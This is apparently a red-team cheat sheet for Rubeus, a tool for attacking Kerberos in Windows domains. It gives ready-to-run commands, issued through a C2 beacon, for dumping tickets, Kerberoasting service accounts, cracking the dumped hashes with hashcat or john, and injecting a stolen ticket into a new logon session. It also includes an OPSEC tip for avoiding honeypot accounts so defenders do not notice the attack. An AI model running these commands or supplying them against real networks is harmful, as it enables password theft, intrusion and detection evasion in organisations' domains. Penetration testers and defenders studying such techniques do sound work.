Rubeus is a tool for enumerating and abusing Kerberos. See also a detailed guide on Rubeus

Usage

Rubeus.exe [subcommand]

Subcommands

  • triage: list all Kerberos tickets in current logon session (but shows all tickets on machine if elevated)
  • dump /luid:[luid] /service:[service name]: dump ticket identified by user’s LUID (see triage) & service (the service will be krbtgt if ticket is TGT); service optional
    • add /nowrap to output hash on one line (makes copying easier)
  • Kerberoasting: beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
    • automatically enumerate all Kerberoastable user and dump their hashes
    • The TGS-REP hashes dumped can be cracked (i.e. using hashcat) to obtain the plaintext password.
    • hashcat: -a 0 -m 13100 [hashes] [wordlist]
    • john: --format=krb5tgs --wordlist=[wordlist] [hashes]
    • OPSEC warning: This command finds every Kerboastable user. If there was an intentionally roastable honey pot account, running the command will be a clear indication of attack to the blue team.
    • Alternatively, use ADSearch to enumerate the roastable users, and dump the hash manually: beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:[username] /nowrap
  • beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[target-user] /password:[does-not-matter] /ticket:[tgs-base64]